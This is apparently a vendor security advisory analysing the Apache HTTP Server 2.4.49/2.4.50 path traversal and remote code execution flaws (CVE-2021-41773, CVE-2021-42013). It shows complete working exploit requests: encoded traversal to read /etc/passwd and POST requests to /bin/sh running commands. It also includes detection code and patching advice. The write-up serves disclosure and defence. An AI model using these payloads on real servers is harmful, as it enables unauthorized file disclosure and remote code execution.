Apache HTTP server path traversal and remote code execution (CVE-2021-41773 and CVE-2021-42013)

On October 4, 2021, the Apache HTTP Server project published a security advisory for a path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49 and 2.4.50, tracked as CVE-2021-41773 and CVE-2021-42013. In the advisory, Apache also noted that “the issue is known to be exploited in the wild”, and it was later identified that the vulnerability can be exploited to perform remote code execution. To exploit either vulnerability, the Apache HTTP server must be running in a non-default configuration.

Because the vulnerabilities are configuration dependent, checking the version of the Apache web server is not sufficient to identify vulnerable servers. With both CVEs being actively exploited, Qualys Web Application Scanning has published QIDs 150372, 150373 and 150374, which send a specially crafted HTTP request to the target server to determine whether it is exploitable. Once detected, users can remediate the vulnerabilities by upgrading to Apache HTTP Server 2.4.51 or higher.

About CVE-2021-41773

According to CVE-2021-41773, Apache HTTP Server 2.4.49 is vulnerable to path traversal and remote code execution attacks.

Path traversal analysis

The path traversal vulnerability was introduced by a new code change for path normalization, i.e. code that strips unwanted or dangerous parts from the URL path, which was inadequate at detecting the different encodings of the dot-dot-slash (../) path traversal sequence.

To prevent path traversal attacks, the normalization function, which is responsible for resolving URL-encoded values in the requested URI, decoded the encoded values one at a time. Therefore, when the second dot is URL-encoded as %2e, the logic fails to recognize %2e as a dot at the point of the check and does not treat it as one, which turns ../ into .%2e/ and bypasses the check.

In addition to bypassing the path traversal check, for an Apache HTTP server to be vulnerable, its configuration must either contain a directory directive for the entire server filesystem with Require all granted, or the directory directive must be absent from the configuration file altogether.

Vulnerable configuration:

Require all granted

Therefore, bypassing the dot-dot check with .%2e and chaining it with a misconfigured directory directive allows an attacker to read arbitrary files such as /etc/passwd from the vulnerable server’s filesystem.

Exploitation: path traversal

Request:

GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 08:13:02 GMT
Server: Apache/2.4.49 (Unix)
Last-Modified: Mon, 27 Sep 2021 00:00:00 GMT
ETag: "39e-5cceec7356000"
Accept-Ranges: bytes
Content-Length: 926
Connection: close

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

Please note that the default Apache HTTP server configuration has the directory directive for the entire filesystem set to Require all denied and is therefore not vulnerable.

Remote code execution analysis

While CVE-2021-41773 was originally documented as a path traversal and file disclosure vulnerability, further research concluded that it can also be exploited to perform remote code execution when the mod_cgi module is enabled on the Apache HTTP server: this allows an attacker to combine the path traversal with an HTTP POST request to invoke any binary on the system.

Configuration to enable the mod_cgi module:

LoadModule cgid_module modules/mod_cgid.so

By default the mod_cgi module is disabled on the Apache HTTP server, with the above line commented out in the configuration file. Consequently, when mod_cgi is enabled and “Require all granted” is applied to the filesystem directory directive, an attacker can execute commands remotely on the Apache server.

Exploitation: remote code execution

Request:

POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Content-Length: 7
Content-Type: application/x-www-form-urlencoded
Connection: close

echo;id

Response:

HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 09:58:23 GMT
Server: Apache/2.4.49 (Unix)
Connection: close
Content-Length: 45

uid=1(daemon) gid=1(daemon) groups=1(daemon)

Looking at the HTTP POST request for RCE, we can see that /bin/sh is the system binary that executes the echo;id payload and returns the output of the id command in the response.

About CVE-2021-42013

CVE-2021-42013 was introduced because the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient: it did not cover double URL encoding. The vulnerable configurations remained the same, but the payload used against 2.4.49 was double URL-encoded against 2.4.50 to carry out the same path traversal and remote code execution attacks.

The attack on 2.4.49 encoded the second dot (.) as %2e; the same dot was double URL-encoded as %%32%65 for version 2.4.50.

Encoding analysis

Conversion: dot → %2e → %%32%65

  • 2 is encoded as %32

  • e is encoded as %65

  • the original % is left as is

So one dot becomes %%32%65, which ultimately converts ../ into the double URL-encoded form %%32%65%%32%65/
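To make the two bypasses concrete, the following added Python example (not Qualys or Apache code) models the check at each decoding stage described above for CVE-2021-41773 (.%2e) and here for CVE-2021-42013 (%%32%65), and shows a defender-side check that decodes a logged request path to a fixed point before looking for a dot-dot segment. The two "model" functions are deliberate simplifications of the normalization logic, not Apache's ap_normalize_path, and the sample paths are constructed from the payload styles on this page.

```python
from urllib.parse import unquote


def has_dotdot_segment(path: str) -> bool:
    """True if any '/'-separated segment of the path is exactly '..'."""
    return any(seg == ".." for seg in path.split("/"))


def accepted_by_2449_model(path: str) -> bool:
    """Simplified model of 2.4.49: the dot-dot check runs on the raw
    characters, so '.%2e' is not seen as '..' even though the later
    file lookup decodes it. Returns True when the request gets through."""
    return not has_dotdot_segment(path)


def accepted_by_2450_model(path: str) -> bool:
    """Simplified model of 2.4.50: one round of %XX decoding precedes the
    check. '.%2e' is now caught, but '%%32%65' decodes only to '%2e'."""
    return not has_dotdot_segment(unquote(path))


def decode_fully(path: str, max_rounds: int = 5):
    """Decode %XX repeatedly until the string stops changing.
    Returns (decoded_path, rounds_needed)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(path)
        if decoded == path:
            break
        path, rounds = decoded, rounds + 1
    return path, rounds


def is_traversal_attempt(path: str) -> bool:
    """Defender-side check for access-log paths: decode to a fixed point
    first, then look for a '..' segment. Catches both payload styles."""
    decoded, _ = decode_fully(path)
    return has_dotdot_segment(decoded)


# Constructed sample request paths mirroring the two payload styles above.
PATH_2449 = "/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd"
PATH_2450 = "/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/etc/passwd"
PATH_BENIGN = "/cgi-bin/printenv?x=1"

if __name__ == "__main__":
    for p in (PATH_2449, PATH_2450, PATH_BENIGN):
        print(f"{p}\n  2.4.49 model accepts: {accepted_by_2449_model(p)}"
              f"\n  2.4.50 model accepts: {accepted_by_2450_model(p)}"
              f"\n  traversal attempt:    {is_traversal_attempt(p)}")
```

The number of decode rounds returned by decode_fully (1 for the .%2e form, 2 for the %%32%65 form) is itself a useful field to log, since benign paths need none.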

Exploitation: path traversal

Request:

GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 10:16:51 GMT
Server: Apache/2.4.50 (Unix)
Last-Modified: Mon, 27 Sep 2021 00:00:00 GMT
ETag: "39e-5cceec7356000"
Accept-Ranges: bytes
Content-Length: 926
Connection: close

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

Exploitation: remote code execution

Request:

POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 7

echo;id

Response:

HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 10:42:40 GMT
Server: Apache/2.4.50 (Unix)
Connection: close
Content-Length: 45

uid=1(daemon) gid=1(daemon) groups=1(daemon)

Detect vulnerabilities with Qualys WAS

Customers can detect these vulnerabilities with Qualys Web Application Scanning using the following QIDs:

  • 150372: Apache HTTP Server Path Traversal (CVE-2021-41773)

  • 150373: Apache HTTP Server Remote Code Execution (CVE-2021-41773)

  • 150374: Apache HTTP Server Multiple Vulnerabilities (CVE-2021-42013)

QID 150372 – Apache HTTP Server Path Traversal (CVE-2021-41773)

Report

After the vulnerability is successfully detected by Qualys WAS, users will see results similar to the following for QID 150372 in the vulnerability scan report:

Solution

Organizations using Apache HTTP Server 2.4.49 or 2.4.50 are advised to upgrade to HTTP Server 2.4.51 or later to patch CVE-2021-41773 and CVE-2021-42013; more information is available in the Apache security advisory.

To maintain best security practices, Qualys also advises users to ensure that:

  • The mod_cgi module stays disabled (its default) unless the organization requires it.

  • The filesystem directory directive is set to Require all denied, as shown below:

Require all denied

References

Apache Security Advisory:

https://httpd.apache.org/security/vulnerabilities_24.html

CVE details:

https://nvd.nist.gov/vuln/detail/CVE-2021-41773
https://nvd.nist.gov/vuln/detail/CVE-2021-42013

Credits for vulnerability discovery go to:

  • Ash Daulton and the cPanel Security Team

  • Juan Escobar of Dreamlab Technologies

  • Fernando Muñoz from the NULL Life CTF team

  • Shungo Kumasaka and Nattapon Jongcharoen

Contributor

Jyoti Raval, Senior Web Application Security Analyst, Qualys


Disclaimer

Qualys inc. published this content on October 27, 2021 and is solely responsible for the information it contains. Distributed by Public, unedited and unmodified, on October 28, 2021 06:30:03 AM UTC.
